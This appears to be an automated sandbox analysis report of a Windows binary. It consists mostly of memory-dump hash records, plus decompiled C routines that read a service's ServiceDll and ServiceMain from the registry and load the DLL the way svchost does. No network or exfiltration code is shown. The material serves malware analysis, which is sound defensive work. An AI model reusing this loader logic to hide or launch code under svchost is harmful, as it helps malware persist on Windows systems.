                            • Opcode Fuzzy Hash: 44c45686461a5238ac4a59b98095bd136883a3ffecddcc6aa482f0016e8efdbc
                            • Instruction Fuzzy Hash: 91F082B0A04259AFDB14EBB8D946E6EB7B8EF04308F040499FA05DB3C0FA34D900C794
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: cef287d3a58edc4506d68404e4e9c074efcd5d8abc92582d846d99123521daca
                            • Instruction ID: 394b297ccd4ac0132637869efa28f394686b353db8ff007eff03ae32f99bdc2e
                            • Opcode Fuzzy Hash: cef287d3a58edc4506d68404e4e9c074efcd5d8abc92582d846d99123521daca
                            • Instruction Fuzzy Hash: 1DF0BE35A00149ABDF039B6CC860BBABFE5AF0425CF0A4219D9D1BB5E1E724B801C795
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bf7480240dfc71487ae19c381eb718b71ee4550cbcf56ba84accd98ae82701bb
                            • Instruction ID: 0f2acd1ede6271721d76dcaa0d7bcd10500c3463be089a76cdd8ee1947f0bb0e
                            • Opcode Fuzzy Hash: bf7480240dfc71487ae19c381eb718b71ee4550cbcf56ba84accd98ae82701bb
                            • Instruction Fuzzy Hash: 3DF08270A05219AFDB14EBACE956EAE77B8EF19308F10019AE915EB2C0EA34D900C754
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fbccf6418fe4084f1c2f0e9df0bde444a59d422456fe8109d6b950338378888f
                            • Instruction ID: 29ef52ffe9d763f1ddf4206d124fc9915fbc02ced911f54c71774a7993085231
                            • Opcode Fuzzy Hash: fbccf6418fe4084f1c2f0e9df0bde444a59d422456fe8109d6b950338378888f
                            • Instruction Fuzzy Hash: 0CF0E232625684CFD776EB1CC184BA2BBD8AB00B7CF4495A4E60587922C724FC40C648
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7a73073d51dbf528847e56ba0f21266de0dec28dd2fd0b902fbe40a533028d36
                            • Instruction ID: 9ee56a7161ee65ae1652c695c9b50878abe0baf42bff7df3e08ecb89a430459a
                            • Opcode Fuzzy Hash: 7a73073d51dbf528847e56ba0f21266de0dec28dd2fd0b902fbe40a533028d36
                            • Instruction Fuzzy Hash: 50E09272A46421ABD2225A18BC00F6673ADDBE4A59F094035E604D7254DA28DD01C7E0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                            • Instruction ID: 661480c0e3bc13684bb05376d526760751c1246d39e820cecdd0c5051002e1a7
                            • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                            • Instruction Fuzzy Hash: B8E0DF32A40158FBDB21ABDD9E09FAABFECDB98A60F000196BA04D7190D5749E00C2D0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 90b9cfbab0968ac5717d539c9682d12f7ac028f3d071bebd02e8f576089b71ae
                            • Instruction ID: 984932244119fafb387a2472a002841a30f33bf8acebb3df3f680d998963f22d
                            • Opcode Fuzzy Hash: 90b9cfbab0968ac5717d539c9682d12f7ac028f3d071bebd02e8f576089b71ae
                            • Instruction Fuzzy Hash: 36E068B2124201CFD735CF59D6A0F15BB9C9B41721F09422DEB0847082C221D840C285
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7ea0d219d902bc5c6e3994a7744005de61badd3661775f1311119d4a41864df8
                            • Instruction ID: a57ab6081943e28235c4067ac3cee21240271d25df3c58fd59a40724f9063429
                            • Opcode Fuzzy Hash: 7ea0d219d902bc5c6e3994a7744005de61badd3661775f1311119d4a41864df8
                            • Instruction Fuzzy Hash: 13F03979922702EFCBB2EFADF50071476B8FB94729F4241AAD11087288D73868A4CF05
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                            • Instruction ID: cf387f879d184a1f2c8dea11206d5d69c6f501db898939fa14f78a5229eb0a46
                            • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                            • Instruction Fuzzy Hash: 11E0C231280209FBDF225E88CC01F797B5ADB50BA5F104031FE085AAA1C675AC91D6C4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a7041728d7997f3dd0630381e4b49a25521c307fc61bb346368b21d2ca0be0e3
                            • Instruction ID: 2a2b9e28c94c97d6c39bf616da5708513a26956b9d6d2c512f3dc0be66d83a00
                            • Opcode Fuzzy Hash: a7041728d7997f3dd0630381e4b49a25521c307fc61bb346368b21d2ca0be0e3
                            • Instruction Fuzzy Hash: 63D02BE213208016C72E5304A826B253652F7807ADF34041CF2134B5D9E96088E88108
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 373bbeb899863200bfe69fe57c864ee9cd9f96805b71b29cf38cb2ec2b4997d0
                            • Instruction ID: b84deb6860febcaf9dbddc4c6f17dffbd5563f98819d958575d6886becb2f12c
                            • Opcode Fuzzy Hash: 373bbeb899863200bfe69fe57c864ee9cd9f96805b71b29cf38cb2ec2b4997d0
                            • Instruction Fuzzy Hash: 68D0A77120010292EA2E5B289C24B542651EB907ADF38045CF707494C1DFA5CD92E048
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                            • Instruction ID: a9a9a6c7b15ee4ab533709b382c05cefc5ab4d4ed4272621c75af630683fabd2
                            • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                            • Instruction Fuzzy Hash: 48E08C319406849BCF13DB4CC650F5EBBF9FB44B80F250028A1089F661C624AC00CB00
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                            • Instruction ID: 481e3a919b66fc597fe57c76fa0ed2978558a794fc9dd99cfb9c8f38ab242eb7
                            • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                            • Instruction Fuzzy Hash: 18D0E935352981CFD617CB1DC554B1577B4BB44B44FC504A4E605CB762E62CE944CA10
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                            • Instruction ID: 6db9f24b751c28fff6117f53eb658a4d840ea4c7cc36b9b0ec8342e000b12a1e
                            • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                            • Instruction Fuzzy Hash: 51D02231411189DEEB0AEB18C21877C7BB3FF00A3CF5C2069C1020686EC33A4A0EC700
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                            • Instruction ID: 83b2ca663131250fb5226a349fa6e5696f5119d23373ab6c4a207c341ab01819
                            • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                            • Instruction Fuzzy Hash: 47C08C302A0A06AAEB221F24CE01B003AE1BB10B05F8400A06300DA0F0FB7CD901E600
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                            • Instruction ID: 242e21fba68170728dc8b9402db0fe800a90b56a2a97db64bc798be585d24da6
                            • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                            • Instruction Fuzzy Hash: 6DC01232040548BBCB126E85CC00F057B6AE754760F004010B5080A560C532D970D644
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                            • Instruction ID: e6a84d7bc79ab743f65f930acaf4f9594c5f5fa6ae2b0ac27c9519f8a3aa995f
                            • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                            • Instruction Fuzzy Hash: 70C04C32180648BBC7126E45DD11F157B69E7A4B60F154021B7040A5A1D576ED61D598
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                            • Instruction ID: b471c99382d42564a95f4c874a5b086c28c12d1b6bc3608f3607cbfdd65e2463
                            • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                            • Instruction Fuzzy Hash: 35C08C32080248BBC7126A49CD00F117B69E7A0BA0F000020B6040A6A2C932E861D588
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                            • Instruction ID: ef4871d0dcd036f20d43e37ff3d2ab88b4c6b540dd37ec766c50b0901abe48f9
                            • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                            • Instruction Fuzzy Hash: E9C08C701611825EEB2B570CCE20B307A90AB08A08F4801BCEB41094E2D368B803C248
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                            • Instruction ID: ec6bf6e63a35b51222220ed943fa95231744408dc4fd97cb9ad0ce37e6289695
                            • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                            • Instruction Fuzzy Hash: 31C02B70151840FBD71A5F34CE50F147294F700A35F6407647320454F0E52C9C00D100
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                            • Instruction ID: f296e9381450ea0216576000eeed2a695633abd4844f62fcf431b3ed29cf2bdf
                            • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                            • Instruction Fuzzy Hash: A9B092353019408FCE17DF18C090B1533E4BB44A84B8400D0E400CBA21D229E9008900
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                            • Instruction ID: 33b1297b0966b6cb3d14bccee0dcc02b538ec40d11cf9c7e692eba16db58fd8a
                            • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                            • Instruction Fuzzy Hash: B1B01232C20449CFCF03EF40C610B29B332FB00750F0744A4910167930C228AC01CB40
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3535d546259a2dc770382ec4fc543671d8c21dc26e9fd7b4669a3a7dd6d14f0e
                            • Instruction ID: d7401caef395305b89a5a1b2f99badd5a484cd9c23ea6e9ef5225f87d6cf400c
                            • Opcode Fuzzy Hash: 3535d546259a2dc770382ec4fc543671d8c21dc26e9fd7b4669a3a7dd6d14f0e
                            • Instruction Fuzzy Hash: D99002A521140403D540659948046070005A7D0347F91C021A2054556ECA698C657179
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e878e6d9b018e3ff0afb2a837546fed04d9d4e33423d29f133ed4c9f53908aa8
                            • Instruction ID: 82854ea92685fc5329bfec17ecd1e00071de7a0a5db65394d44e8cfdc64a7f92
                            • Opcode Fuzzy Hash: e878e6d9b018e3ff0afb2a837546fed04d9d4e33423d29f133ed4c9f53908aa8
                            • Instruction Fuzzy Hash: 3C9002A522100042D504619944047060045A7E1246F91C022A2144555CC5698C756169
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1e07925ed85acfcfb8c2f08bad538dacbb8ce58ec96aec330588dc91f9f5e0a8
                            • Instruction ID: e7905942402744c824e1deaa893e296f63644a070eddeeabcbff6977cfd864ff
                            • Opcode Fuzzy Hash: 1e07925ed85acfcfb8c2f08bad538dacbb8ce58ec96aec330588dc91f9f5e0a8
                            • Instruction Fuzzy Hash: DB90027525100402D541719944046060009B7D0286FD1C022A0414555EC6958A6ABAA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 47be5d6008360c9cc3b0090559128df1b66777640a73f4eca225159ca931a329
                            • Instruction ID: ae57d3d96746d16a5c3636fc22f29bad94182e1e76b0ab77bca212691dd7bd45
                            • Opcode Fuzzy Hash: 47be5d6008360c9cc3b0090559128df1b66777640a73f4eca225159ca931a329
                            • Instruction Fuzzy Hash: 4A9002A5611140438940B19948044065015B7E13463D1C131A0444561CC6A88869A2A9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 520194c0d3d6365d035694aeaa400e18c4db0ddb406506c3efc0e5836033c44f
                            • Instruction ID: c9d494e2b46cec4d90913e4434fc3fb64e31eef630190611812e54ebd96eaf1a
                            • Opcode Fuzzy Hash: 520194c0d3d6365d035694aeaa400e18c4db0ddb406506c3efc0e5836033c44f
                            • Instruction Fuzzy Hash: 1990026531100402D502619944146060009E7D138AFD1C022E1414556DC6658967B176
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 70949cdc578eba2e71bef15c8b052eb7b06277bf9c9d540e64a6c0d3d3269f7b
                            • Instruction ID: 03f23a30ac9681ea9519c1b0ae644b75ba7371eccff1f5bf2342856040946ca9
                            • Opcode Fuzzy Hash: 70949cdc578eba2e71bef15c8b052eb7b06277bf9c9d540e64a6c0d3d3269f7b
                            • Instruction Fuzzy Hash: 1C90026525100802D540719984147070006E7D0646F91C021A0014555DC656897976F5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 38fbb34db03acc84edfa041b9e45992fcbdb7d7d6d6853b8078413182afb9c81
                            • Instruction ID: d1d808db274fd138c32fac279d392350b75efe96cf8abb1ad23247def6b64d19
                            • Opcode Fuzzy Hash: 38fbb34db03acc84edfa041b9e45992fcbdb7d7d6d6853b8078413182afb9c81
                            • Instruction Fuzzy Hash: 2390027521144002D5407199844460B5005B7E0346F91C421E0415555CC655886AA265
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000003.00000002.328821788.00000000012C0000.00000040.00000001.sdmp, Offset: 012C0000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8be57f174e30033c24bad527380e24104b816612b446288145050d8419647f45
                            • Instruction ID: e2098ed416aad08158a0720f8053ebb8aa5023ac90c3b56f6f7961636e833012

                            C-Code - Quality: 87%
                            			E008B1160(WCHAR* _a4, WCHAR** _a8) {
                            				void* _v8;
                            				void* _v12;
                            				long _v16;
                            				struct HINSTANCE__* _v20;
                            				void* _v24;
                            				signed int _v28;
                            				WCHAR* _v32;
                            				_Unknown_base(*)()* _v36;
                            				void* _v40;
                            				int _v44;
                            				long _v48;
                            				int _t82;
                            				int _t83;
                            				int _t85;
                            				int _t86;
                            				long _t125;
                            				void* _t134;
                            
                            				_v12 = 0;
                            				_v8 = 0;
                            				_v40 = 0;
                            				_v32 = 0;
                            				_v24 = 0;
                            				_v20 = 0;
                            				_v36 = 0;
                            				_v48 = 0;
                            				_t82 = lstrlenW(L"System\\CurrentControlSet\\Services");
                            				_t83 = lstrlenW("\\");
                            				_t85 = lstrlenW(_a4);
                            				_t86 = lstrlenW("\\");
                            				_t11 = lstrlenW(L"Parameters") + 1; // 0x1
                            				_v28 = _t82 + _t83 + _t85 + _t86 + _t11;
                            				_v8 = HeapAlloc(GetProcessHeap(), 0, _v28 << 1);
                            				lstrcpyW(_v8, L"System\\CurrentControlSet\\Services");
                            				lstrcatW(_v8, "\\");
                            				lstrcatW(_v8, _a4);
                            				lstrcatW(_v8, "\\");
                            				lstrcatW(_v8, L"Parameters");
                            				 *((short*)(_v8 + _v28 * 2 - 2)) = 0;
                            				_v16 = RegOpenKeyExW(0x80000002, _v8, 0, 0x20019,  &_v12);
                            				if(_v16 == 0) {
                            					_v40 = E008B1000(_v12, L"ServiceDll");
                            					if(_v40 != 0) {
                            						_v32 = E008B10B0(_v40);
                            						if(_v32 != 0) {
                            							_v16 = RegQueryValueExA(_v12, "ServiceMain", 0, 0, 0,  &_v44);
                            							if(_v16 != 0) {
                            								L10:
                            								RegCloseKey(_v12);
                            								_v20 = LoadLibraryExW(_v32, 0, 8);
                            								if(_v20 != 0) {
                            									if(_v24 == 0) {
                            										_v36 = GetProcAddress(_v20, "ServiceMain");
                            									} else {
                            										_v36 = GetProcAddress(_v20, _v24);
                            									}
                            									if(_v36 != 0) {
                            										GetProcAddress(_v20, "SvchostPushServiceGlobals");
                            										 *_a8 = _a4;
                            										_a8[1] = _v36;
                            										_v48 = 1;
                            									} else {
                            										FreeLibrary(_v20);
                            									}
                            								} else {
                            									_t125 = GetLastError();
                            									0x8b0000(_v32, _t125);
                            									0x8b0000("failed to load library %s, err=%u\n", _t125);
                            								}
                            								goto L18;
                            							}
                            							_v28 = _v44 + 1;
                            							_v24 = HeapAlloc(GetProcessHeap(), 0, _v28);
                            							_v16 = RegQueryValueExA(_v12, "ServiceMain", 0, 0, _v24,  &_v44);
                            							if(_v16 == 0) {
                            								 *((char*)(_v24 + _v28 - 1)) = 0;
                            								goto L10;
                            							}
                            							RegCloseKey(_v12);
                            							goto L18;
                            						}
                            						RegCloseKey(_v12);
                            						goto L18;
                            					}
                            					RegCloseKey(_v12);
                            					goto L18;
                            				} else {
                            					_t134 = _v8;
                            					0x8b0000(_t134, _v16);
                            					0x8b0000("cannot open key %s, err=%d\n", _t134);
                            					L18:
                            					HeapFree(GetProcessHeap(), 0, _v8);
                            					HeapFree(GetProcessHeap(), 0, _v40);
                            					HeapFree(GetProcessHeap(), 0, _v32);
                            					HeapFree(GetProcessHeap(), 0, _v24);
                            					return _v48;
                            				}
                            			}

                            APIs
                            • lstrlenW.KERNEL32(System\CurrentControlSet\Services), ref: 008B11A4
                            • lstrlenW.KERNEL32(008C2048), ref: 008B11B1
                            • lstrlenW.KERNEL32(00000000), ref: 008B11BD
                            • lstrlenW.KERNEL32(008C204C), ref: 008B11CA
                            • lstrlenW.KERNEL32(Parameters), ref: 008B11D7
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 008B11EC
                            • HeapAlloc.KERNEL32(00000000), ref: 008B11F3
                            • lstrcpyW.KERNEL32 ref: 008B1205
                            • lstrcatW.KERNEL32(00000000,008C2068), ref: 008B1214
                            • lstrcatW.KERNEL32(00000000,00000000), ref: 008B1222
                            • lstrcatW.KERNEL32(00000000,008C206C), ref: 008B1231
                            • lstrcatW.KERNEL32(00000000,Parameters), ref: 008B1240
                            • RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00020019,00000000), ref: 008B1267
                            • RegCloseKey.ADVAPI32(00000000), ref: 008B12AE
                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008B1400
                            • HeapFree.KERNEL32(00000000), ref: 008B1407
                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008B1413
                            • HeapFree.KERNEL32(00000000), ref: 008B141A
                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008B1426
                            • HeapFree.KERNEL32(00000000), ref: 008B142D
                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008B1439
                            • HeapFree.KERNEL32(00000000), ref: 008B1440
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.328173414.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true
                            • Associated: 00000003.00000002.328151588.00000000008B0000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.328204526.00000000008BD000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.328217565.00000000008C2000.00000008.00020000.sdmp
                            • Associated: 00000003.00000002.328229150.00000000008C6000.00000002.00020000.sdmp
                            Similarity
                            • API ID: Heap$Processlstrlen$Freelstrcat$AllocCloseOpenlstrcpy
                            • String ID: Parameters$Parameters$ServiceDll$ServiceMain$ServiceMain$ServiceMain$SvchostPushServiceGlobals$System\CurrentControlSet\Services$cannot open key %s, err=%d$failed to load library %s, err=%u
                            • API String ID: 922840199-2032176762
                            • Opcode ID: e54949b3b39b7d5b75a7b2b24a55c6f236abaac2cc20b02731b8c31fdeb0759b
                            • Instruction ID: 546e82ee9e0dd8c2eb5b87843333ba4a74397b89cb68e9d7899910110b0f6c77
                            • Opcode Fuzzy Hash: e54949b3b39b7d5b75a7b2b24a55c6f236abaac2cc20b02731b8c31fdeb0759b
                            • Instruction Fuzzy Hash: 5D91D575900608FFDB04EBE4D859BAEBBB4FB48701F108619E611AA390E7799942CB64
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 58%
                            			E008B10B0(WCHAR* _a4) {
                            				long _v8;
                            				void* _v12;
                            				long _t25;
                            				long _t30;
                            
                            				_v8 = 0;
                            				_v8 = ExpandEnvironmentStringsW(_a4, 0, _v8);
                            				if(_v8 != 0) {
                            					_t19 = _v8;
                            					_t9 = _t19 + 2; // 0x2
                            					_v12 = HeapAlloc(GetProcessHeap(), 0, _v8 + _t9);
                            					if(ExpandEnvironmentStringsW(_a4, _v12, _v8) != 0) {
                            						return _v12;
                            					}
                            					_t25 = GetLastError();
                            					0x8b0000(_a4, _t25);
                            					0x8b0000("cannot expand env vars in %s: %u\n", _t25);
                            					HeapFree(GetProcessHeap(), 0, _v12);
                            					return 0;
                            				}
                            				_t30 = GetLastError();
                            				0x8b0000(_a4, _t30);
                            				0x8b0000("cannot expand env vars in %s: %u\n", _t30);
                            				return 0;
                            			}

                            APIs
                            • ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000), ref: 008B10C7
                            • GetLastError.KERNEL32 ref: 008B10D6
                            • GetProcessHeap.KERNEL32(00000000,00000002), ref: 008B10FF
                            • HeapAlloc.KERNEL32(00000000), ref: 008B1106
                            • ExpandEnvironmentStringsW.KERNEL32(?,?,00000000), ref: 008B111B
                            • GetLastError.KERNEL32 ref: 008B1125
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 008B1146
                            • HeapFree.KERNEL32(00000000), ref: 008B114D
                            Strings
                            • cannot expand env vars in %s: %u, xrefs: 008B10E7
                            • cannot expand env vars in %s: %u, xrefs: 008B1136
                            Memory Dump Source
                            • Source File: 00000003.00000002.328173414.00000000008B1000.00000020.00020000.sdmp, Offset: 008B0000, based on PE: true
                            • Associated: 00000003.00000002.328151588.00000000008B0000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.328204526.00000000008BD000.00000002.00020000.sdmp
                            • Associated: 00000003.00000002.328217565.00000000008C2000.00000008.00020000.sdmp
                            • Associated: 00000003.00000002.328229150.00000000008C6000.00000002.00020000.sdmp
                            Similarity
                            • API ID: Heap$EnvironmentErrorExpandLastProcessStrings$AllocFree
                            • String ID: cannot expand env vars in %s: %u$cannot expand env vars in %s: %u
                            • API String ID: 3773870257-3849838887
                            • Opcode ID: a3c19922889e737f1f6cb10d266250579e07856bd4b7fb3a93b3117b8501bb32
                            • Instruction ID: 926809ebca4903144a78b4abc0277840de2aaecbb1f29d761a9879a22ddcc61c
                            • Opcode Fuzzy Hash: a3c19922889e737f1f6cb10d266250579e07856bd4b7fb3a93b3117b8501bb32
                            • Instruction Fuzzy Hash: 8411EF75504608BFDB04FBA4DC59FAE7B78FB08301F104559FA09D6250E630DA429B61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 43%
                            			E008B15A0(intOrPtr _a4) {
                            				long _v8;
                            				void* _v12;
                            				void* _v16;
                            				long _t19;
                            				long _t22;
                            
                            				_v16 = 0;
                            				_v12 = 0;
                            				_t19 = RegOpenKeyExW(0x80000002, L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Svchost", 0, 0x20019,  &_v16);
                            				_v8 = _t19;
                            				if(_v8 == 0) {
